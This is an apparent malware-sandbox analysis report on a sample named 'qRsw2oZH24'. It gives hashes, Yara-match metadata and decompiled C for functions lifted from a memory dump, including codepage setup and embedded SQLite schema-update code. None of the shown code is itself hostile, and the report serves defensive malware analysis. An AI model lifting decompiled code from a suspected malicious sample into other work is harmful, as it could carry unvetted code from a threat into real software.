                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00843818 Relevance: .3, Instructions: 303COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalCurrentEnterSectionThread
                                    • String ID:
                                    • API String ID: 3488303727-0
                                    • Opcode ID: 5f71f9a118cf2f9a067c6f36c19e4a41874c023fac3aa9e848fab7c2c839ec2c
                                    • Instruction ID: 2e92f928f56bfcb1543ed1c803f5e5a1c84875bdd337e591ea06664281f0dada
                                    • Opcode Fuzzy Hash: 5f71f9a118cf2f9a067c6f36c19e4a41874c023fac3aa9e848fab7c2c839ec2c
                                    • Instruction Fuzzy Hash: F1B19D316047059FDB28DF28D881B2AB7E5FFC4714F04852DF889DB292DB70E9458B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0087836D Relevance: .2, Instructions: 159COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
                                    • Instruction ID: aa3f5caa80c00640d94f2b3cc8fb3f53a3fb1a9b8b7ef5111ba89c3a06ca2915
                                    • Opcode Fuzzy Hash: ae50731e5f2768dbf173af61d2db561e0aff04396bb3e814e0b1d0d8e45e247c
                                    • Instruction Fuzzy Hash: 6C518F71E00219EFDF04CF99C984AAEBBB2FF88304F19C059E419AB245C7349E51CB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088EA5F Relevance: .1, Instructions: 104COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: ccf27f04e60da498be2d7ab7b0a49b2ca62c9cfe42d400303502826343775fc6
                                    • Instruction ID: 0e3730747792bd245eb2804584fe4fac9bd70e0db8b423cd3c5917e500382107
                                    • Opcode Fuzzy Hash: ccf27f04e60da498be2d7ab7b0a49b2ca62c9cfe42d400303502826343775fc6
                                    • Instruction Fuzzy Hash: 4221B373F204394B7B0CC47E8C532BDB6E1D78C611745823AE8A6EA2C1D968D917E2E4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088E93F Relevance: .1, Instructions: 81COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c439f5c6264a80bbcb56a701ebffd75704edf99af87f5f5db1451b02ab93d60d
                                    • Instruction ID: b7b707a1beba1c8fc1a0ae7e747665eae7d1be11be4469fe03b1cee06430f784
                                    • Opcode Fuzzy Hash: c439f5c6264a80bbcb56a701ebffd75704edf99af87f5f5db1451b02ab93d60d
                                    • Instruction Fuzzy Hash: B9118A63F30C255B675C816D8C172BA95D2EBD825070F533AD826E7284F994DE13D390
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008172BC Relevance: .1, Instructions: 75COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50a4832109869c54e889b288bb59c124fd1ed34302e63994eb65b342b93bf6b9
                                    • Instruction ID: 2503f1d9673fc9407b3143b2dfbfa3129254d50e6a040425b7d3d59d98553109
                                    • Opcode Fuzzy Hash: 50a4832109869c54e889b288bb59c124fd1ed34302e63994eb65b342b93bf6b9
                                    • Instruction Fuzzy Hash: 6F2127719150B10A9B0C863AAC21436FBA4EBC720238F42AFEAD7D94D2C669D565D7A0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00880095 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
                                    • Instruction ID: 31453d8105a96306da52e1eb4e329000fa725be3a28ab3a6e2d27948ac08cd33
                                    • Opcode Fuzzy Hash: 6e9bcc707df8b390229348158767f5ae8ff0e3f6b9a17f112719d29a863f4808
                                    • Instruction Fuzzy Hash: AFE04632911228EBCB14EB8CC904A8AF3ACFB45B10B1540A6B501E3101C6B0DE44CBD2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00876BA0 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E00876BA0(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				intOrPtr* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char* _v80;
				char* _v84;
				void* _v88;
				char _v92;
				void* __edi;
				void* __ebp;
				signed int _t126;
				char _t129;
				intOrPtr* _t131;
				char _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				intOrPtr* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				char _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				short* _t221;
				intOrPtr _t222;
				signed int _t223;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				void* _t236;
				signed char _t237;
				signed char* _t238;
				void* _t239;
				char* _t241;
				char* _t242;
				signed char* _t253;
				void* _t255;
				intOrPtr* _t256;
				intOrPtr* _t260;
				signed int _t261;
				short* _t262;
				signed int _t265;
				signed int _t266;
				void* _t267;
				void* _t268;

				_t126 =  *0x8b2014; // 0x61232540
				_v8 = _t126 ^ _t266;
				_t256 = _a4;
				_t205 = 0;
				_v56 = _t256;
				_t239 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t256 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t256;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *((intOrPtr*)(_t256 + 0x8c));
					if( *((intOrPtr*)(_t256 + 0x8c)) != 0) {
						asm("lock dec dword [eax]");
					}
					 *((intOrPtr*)(_t256 + 0x8c)) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *((intOrPtr*)(_t256 + 0x90)) = _t205;
					 *_t256 = 0x89cb40;
					 *((intOrPtr*)(_t256 + 0x94)) = 0x89cdc0;
					 *((intOrPtr*)(_t256 + 0x98)) = 0x89cf40;
					 *((intOrPtr*)(_t256 + 4)) = 1;
					L48:
					return E0086E288(_t129, _v8 ^ _t266);
				}
				_t131 = _t256 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E008800C6(_t213, 1, 4);
					E00880123(_t205);
					_v32 = E008800C6(_t213, 0x180, 2);
					E00880123(_t205);
					_t239 = E008800C6(_t213, 0x180, 1);
					_v44 = _t239;
					E00880123(_t205);
					_v36 = E008800C6(_t213, 0x180, 1);
					E00880123(_t205);
					_v40 = E008800C6(_t213, 0x101, 1);
					E00880123(_t205);
					_t268 = _t267 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E00880123(_v52);
						E00880123(_v32);
						E00880123(_t239);
						E00880123(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t239 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *((char*)(_t147 + _t217)) = _t147;
								_t147 = _t147 + 1;
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t256 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t239 + 0x81; // 0x81
								_v48 = _v40 + 1;
								_t153 = E0088169D(_t286, _t205,  *((intOrPtr*)(_t256 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t256 + 8), _t205);
								_t268 = _t268 + 0x24;
								_t287 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E0088169D(_t287, _t205,  *((intOrPtr*)(_t256 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t256 + 8), _t205);
								_t268 = _t268 + 0x24;
								_t288 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = L00884EB2(_t288, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t256 + 8), _t205);
								_t268 = _t268 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t236 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t241 = _t236 + 0x80;
								 *((char*)(_t236 + 0x7f)) = _t205;
								_v80 = _t241;
								 *((char*)(_t222 + 0x7f)) = _t205;
								 *_t241 = _t205;
								_t242 = _t222 + 0x80;
								_v84 = _t242;
								 *_t242 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									_push(0x1f);
									asm("movsw");
									_t164 = memcpy(_t236, _t236 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t165 = memcpy(_t164, _t164 + 0x100, 0 << 2);
									asm("movsw");
									asm("movsb");
									_t260 = _v56;
									if( *((intOrPtr*)(_t260 + 0x8c)) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E00880123( *((intOrPtr*)(_t260 + 0x90)) - 0xfe);
											E00880123( *((intOrPtr*)(_t260 + 0x94)) - 0x80);
											E00880123( *((intOrPtr*)(_t260 + 0x98)) - 0x80);
											E00880123( *((intOrPtr*)(_t260 + 0x8c)));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *((intOrPtr*)(_t260 + 0x8c)) = _t166;
									 *_t260 = _v72;
									 *((intOrPtr*)(_t260 + 0x90)) = _v76;
									 *((intOrPtr*)(_t260 + 0x94)) = _v80;
									 *((intOrPtr*)(_t260 + 0x98)) = _v84;
									 *(_t260 + 4) = _v60;
									L44:
									E00880123(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t256 + 8) != 0xfde9) {
									_t253 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t253[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t261 =  *_t253 & 0x000000ff;
										_v64 = _t261;
										__eflags = _t261 - (_t183 & 0x000000ff);
										if(_t261 > (_t183 & 0x000000ff)) {
											L37:
											_t253 =  &(_t253[2]);
											__eflags =  *_t253;
											if( *_t253 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t236;
										_t186 = _t222 + 0x80 + _t261;
										_t237 = _t236 - _t222;
										__eflags = _t237;
										_t230 = _v64;
										_t262 = _t207 - 0xffffff00 + _t261 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t262 = 0x8000;
											_t262 = _t262 + 2;
											 *(_t237 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t253[1] & 0x000000ff);
										} while (_t230 <= (_t253[1] & 0x000000ff));
										_t236 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t236 + 0x100;
								_t255 = _t222 - _t236;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t236;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t255 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t286 =  *(_t256 + 8) - 0xfde9;
							if( *(_t256 + 8) != 0xfde9) {
								_t238 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t238[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t265 =  *_t238 & 0x000000ff;
									__eflags = _t265 - (_t197 & 0x000000ff);
									if(_t265 > (_t197 & 0x000000ff)) {
										L20:
										_t238 =  &(_t238[2]);
										__eflags =  *_t238 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t265 + _t232)) = 0x20;
										_t265 = _t265 + 1;
										__eflags = _t265 - (_t238[1] & 0x000000ff);
									} while (_t265 <= (_t238[1] & 0x000000ff));
									goto L20;
								}
								_t256 = _v56;
								goto L22;
							}
							E00870BE0(_t239, _v40 - 0xffffff80, 0x20, 0x80);
							_t268 = _t268 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = L00884D02(__edx);
				_t268 = _t267 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}







































































                                    0x00876ba8
                                    0x00876baf
                                    0x00876bb4
                                    0x00876bb7
                                    0x00876bba
                                    0x00876bbd
                                    0x00876bbf
                                    0x00876bc2
                                    0x00876bc8
                                    0x00876bcb
                                    0x00876bce
                                    0x00876bd1
                                    0x00876bd6
                                    0x00876fb9
                                    0x00876fbb
                                    0x00876fbd
                                    0x00876fbd
                                    0x00876fc0
                                    0x00876fc6
                                    0x00876fc6
                                    0x00876fc8
                                    0x00876fce
                                    0x00876fd4
                                    0x00876fde
                                    0x00876fe8
                                    0x00876fef
                                    0x00876ffd
                                    0x00876ffd
                                    0x00876bdc
                                    0x00876bdf
                                    0x00876be4
                                    0x00876c02
                                    0x00876c0c
                                    0x00876c0f
                                    0x00876c22
                                    0x00876c25
                                    0x00876c32
                                    0x00876c35
                                    0x00876c38
                                    0x00876c4a
                                    0x00876c4d
                                    0x00876c5f
                                    0x00876c62
                                    0x00876c67
                                    0x00876c6d
                                    0x00876f82
                                    0x00876f85
                                    0x00876f8d
                                    0x00876f93
                                    0x00876f9b
                                    0x00876fa5
                                    0x00876fa5
                                    0x00000000
                                    0x00876c7c
                                    0x00876c7c
                                    0x00876c81
                                    0x00000000
                                    0x00876c98
                                    0x00876c98
                                    0x00876c9a
                                    0x00876c9a
                                    0x00876c9d
                                    0x00876c9e
                                    0x00876cb4
                                    0x00000000
                                    0x00000000
                                    0x00876cba
                                    0x00876cc0
                                    0x00000000
                                    0x00000000
                                    0x00876cc6
                                    0x00876cc9
                                    0x00876ccf
                                    0x00876d25
                                    0x00876d28
                                    0x00876d47
                                    0x00876d4b
                                    0x00876d50
                                    0x00876d53
                                    0x00876d55
                                    0x00000000
                                    0x00000000
                                    0x00876d7e
                                    0x00876d83
                                    0x00876d86
                                    0x00876d88
                                    0x00000000
                                    0x00000000
                                    0x00876da3
                                    0x00876da9
                                    0x00876dae
                                    0x00876db3
                                    0x00000000
                                    0x00000000
                                    0x00876db9
                                    0x00876dc2
                                    0x00876dc8
                                    0x00876dcb
                                    0x00876dce
                                    0x00876dd1
                                    0x00876dd4
                                    0x00876dda
                                    0x00876ddd
                                    0x00876de0
                                    0x00876de3
                                    0x00876de5
                                    0x00876deb
                                    0x00876dee
                                    0x00876df0
                                    0x00876ec0
                                    0x00876ec7
                                    0x00876ec8
                                    0x00876ed3
                                    0x00876ed6
                                    0x00876ed8
                                    0x00876ee2
                                    0x00876ee5
                                    0x00876ee7
                                    0x00876ef0
                                    0x00876ef2
                                    0x00876ef4
                                    0x00876ef5
                                    0x00876f00
                                    0x00876f05
                                    0x00876f09
                                    0x00876f17
                                    0x00876f2a
                                    0x00876f38
                                    0x00876f43
                                    0x00876f48
                                    0x00876f09
                                    0x00876f4b
                                    0x00876f4e
                                    0x00876f54
                                    0x00876f5d
                                    0x00876f62
                                    0x00876f6b
                                    0x00876f74
                                    0x00876f7d
                                    0x00876fa6
                                    0x00876fa9
                                    0x00876faf
                                    0x00000000
                                    0x00876faf
                                    0x00876dfd
                                    0x00876e56
                                    0x00876e59
                                    0x00876e5c
                                    0x00000000
                                    0x00000000
                                    0x00876e5e
                                    0x00876e61
                                    0x00876e61
                                    0x00876e64
                                    0x00876e66
                                    0x00000000
                                    0x00000000
                                    0x00876e68
                                    0x00876e6e
                                    0x00876e71
                                    0x00876e73
                                    0x00876eb6
                                    0x00876eb6
                                    0x00876eb9
                                    0x00876ebc
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00876ebc
                                    0x00876e7b
                                    0x00876e84
                                    0x00876e86
                                    0x00876e86
                                    0x00876e88
                                    0x00876e8b
                                    0x00876e8e
                                    0x00876e91
                                    0x00876e93
                                    0x00876e98
                                    0x00876e9b
                                    0x00876e9e
                                    0x00876ea1
                                    0x00876ea3
                                    0x00876ea8
                                    0x00876ea9
                                    0x00876ea9
                                    0x00876ead
                                    0x00876eb0
                                    0x00876eb3
                                    0x00000000
                                    0x00876eb3
                                    0x00876ebe
                                    0x00876ebe
                                    0x00000000
                                    0x00876ebe
                                    0x00876e06
                                    0x00876e09
                                    0x00876e16
                                    0x00876e18
                                    0x00876e1d
                                    0x00876e20
                                    0x00876e23
                                    0x00876e2b
                                    0x00876e2d
                                    0x00876e3b
                                    0x00876e3e
                                    0x00876e41
                                    0x00876e44
                                    0x00876e46
                                    0x00876e49
                                    0x00876e4d
                                    0x00000000
                                    0x00876e54
                                    0x00876cd1
                                    0x00876cd8
                                    0x00876cf2
                                    0x00876cf5
                                    0x00876cf8
                                    0x00000000
                                    0x00000000
                                    0x00876cfa
                                    0x00876cfd
                                    0x00876cfd
                                    0x00876d00
                                    0x00876d02
                                    0x00000000
                                    0x00000000
                                    0x00876d04
                                    0x00876d0a
                                    0x00876d0c
                                    0x00876d1b
                                    0x00876d1b
                                    0x00876d1e
                                    0x00876d20
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00876d0e
                                    0x00876d0e
                                    0x00876d0e
                                    0x00876d12
                                    0x00876d17
                                    0x00876d17
                                    0x00000000
                                    0x00876d0e
                                    0x00876d22
                                    0x00000000
                                    0x00876d22
                                    0x00876ce8
                                    0x00876ced
                                    0x00000000
                                    0x00876ced
                                    0x00876c81
                                    0x00876c6d
                                    0x00876be6
                                    0x00876be7
                                    0x00876bec
                                    0x00876bf0
                                    0x00876bf1
                                    0x00876bf2
                                    0x00876bf7
                                    0x00876bfc
                                    0x00000000
                                    0x00000000
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$Info
                                    • String ID:
                                    • API String ID: 2509303402-0
                                    • Opcode ID: 8137a7800ae4343ad50dd070ba04c1e45f73c49ca91222071082d451b0110363
                                    • Instruction ID: 4f24a265b41304959d24c4c51b703a8c2bc8284186ddde0c8d7d869cda34ad4b
                                    • Opcode Fuzzy Hash: 8137a7800ae4343ad50dd070ba04c1e45f73c49ca91222071082d451b0110363
                                    • Instruction Fuzzy Hash: 12D1AC71D006059FDB21DFA8C881BEEBBF5FF08310F148069E499E7286EB75A945CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0084972D Relevance: 19.5, APIs: 2, Strings: 9, Instructions: 299COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 64%
                                    			E0084972D(char __ecx, signed int* __edx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char* _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				char _v62;
				char* _v80;
				char _v84;
				signed int _v108;
				signed int _v120;
				intOrPtr _v128;
				char _v140;
				void* __edi;
				signed int _t116;
				intOrPtr _t121;
				signed int _t122;
				void* _t129;
				void* _t134;
				signed int _t136;
				signed int _t139;
				signed int _t159;
				signed int _t160;
				signed int _t172;
				intOrPtr _t184;
				void* _t213;
				void* _t215;
				void* _t217;
				signed int _t221;
				void* _t225;
				void* _t228;
				intOrPtr _t231;
				char _t232;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;

				_t232 = __ecx;
				_v36 = __edx;
				_v28 = __ecx;
				_t231 =  *((intOrPtr*)(__ecx));
				if(_a4 != 0 || _a8 != 0) {
					if( *((intOrPtr*)(_t232 + 0x40)) != 0 ||  *((char*)(_t231 + 0x1e)) != 0) {
						goto L34;
					} else {
						_t159 =  *(_t232 + 0xd4);
						_v32 = _t159;
						if(_t159 == 0) {
							goto L34;
						}
						_t212 =  *((intOrPtr*)(_t159 + 0x4c));
						_v16 = E0084C6A7(_t231,  *((intOrPtr*)(_t159 + 0x4c)));
						if( *((intOrPtr*)(_t159 + 0x2c)) == 0) {
							L7:
							if( *((intOrPtr*)(_t231 + 0x50)) == 0) {
								L9:
								_t116 = E0084E1A1(_t232, _t212);
								_v12 = _t116;
								if(_t116 == 0) {
									goto L34;
								}
								_push(0);
								_push(0);
								_push(0);
								_t213 = 0x1f;
								L0083CD8E(_t116, _t213);
								_t236 = _t235 + 0xc;
								_v8 = "table";
								_t215 =  ==  ? "TABLE" : "VIEW";
								_t168 =  ==  ? _v8 : "view";
								_v20 =  ==  ? _v8 : "view";
								if(_a8 == 0) {
									_t121 =  *((intOrPtr*)(_t232 + 0xbc));
									_push(_t121);
									_t172 =  *_a4 - _t121 + 1;
									__eflags = _t172;
									_push(_t172);
									_t122 = E00831A38(_t231, "CREATE %s %.*s", _t215);
									_t237 = _t236 + 0x14;
									L16:
									_push( *((intOrPtr*)(_t232 + 0x98)));
									_push(_t122);
									_push( *((intOrPtr*)(_t232 + 0x9c)));
									_v8 = _t122;
									_push( *_t159);
									_v24 = _v16 * 0x18;
									_push( *_t159);
									_push(_v20);
									_v20 = "sqlite_temp_master";
									_t124 =  ==  ? _v20 : "sqlite_master";
									_push( ==  ? _v20 : "sqlite_master");
									E00848597(_t232, "UPDATE %Q.%s SET type=\'%s\', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d",  *((intOrPtr*)(_v16 * 0x18 +  *((intOrPtr*)(_t231 + 8)))));
									E008306DB(_v8);
									_t238 = _t237 + 0x2c;
									E00849478(_t232, _v16, _v16 - 1);
									if( *((char*)(_t159 + 0x38)) != 0) {
										_t192 =  *((intOrPtr*)(_t231 + 8)) + _v24;
										if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t231 + 8)) + _v24 + 0x14)) + 0x54)) == 0) {
											E00848597(_t232, "CREATE TABLE %Q.sqlite_sequence(name,seq)",  *_t192);
											_t238 = _t238 + 0xc;
										}
									}
									_t129 = E00831A38(_t231, "tbl_name=\'%q\'",  *_t159);
									_push(0);
									_push(0);
									_push(_v16);
									_t217 = 0x1d;
									_t116 = E0083D120(_v12, L0083CD8E(_v12, _t217), _t129, 0xffffffff);
									if( *((char*)(_t231 + 0x50)) == 0) {
										goto L34;
									} else {
										_t232 = _v28;
										L21:
										if( *((intOrPtr*)(_t232 + 0x40)) != 0) {
											goto L34;
										}
										_v8 =  *((intOrPtr*)(_t159 + 0x4c));
										_t134 = L00832E2A(_v8 + 4,  *_t159, E00873BA0( *_t159) + 1, _t159);
										if(_t134 == 0) {
											_t116 =  *(_t159 + 0x24);
											_v24 = _t116;
											__eflags = _t116;
											if(_t116 == 0) {
												L30:
												 *(_t232 + 0xd4) =  *(_t232 + 0xd4) & 0x00000000;
												 *((intOrPtr*)(_t231 + 0x20)) =  *((intOrPtr*)(_t231 + 0x20)) + 1;
												 *(_t231 + 0xc) =  *(_t231 + 0xc) | 0x00000010;
												__eflags =  *(_t159 + 0x18);
												if( *(_t159 + 0x18) != 0) {
													goto L34;
												}
												_t184 =  *((intOrPtr*)(_t232 + 0xbc));
												_t221 =  *_v36;
												__eflags = _t221;
												if(_t221 == 0) {
													_t221 =  *_a4;
												}
												_t136 = E008320C4(_t184, _t221 - _t184) + 0xd;
												__eflags = _t136;
												 *(_t159 + 0x30) = _t136;
												return _t136;
											}
											_t160 = _v24;
											_t139 = _v8 + 0x40;
											__eflags = _t139;
											_v8 = _t139;
											do {
												_t97 = E00873BA0( *((intOrPtr*)(_t160 + 8))) + 1; // 0x1
												 *((intOrPtr*)(_t160 + 0xc)) = L00832DDB(_v8,  *((intOrPtr*)(_t160 + 8)), _t97);
												_t116 = L00832E2A(_v8,  *((intOrPtr*)(_t160 + 8)), _t97, _t160);
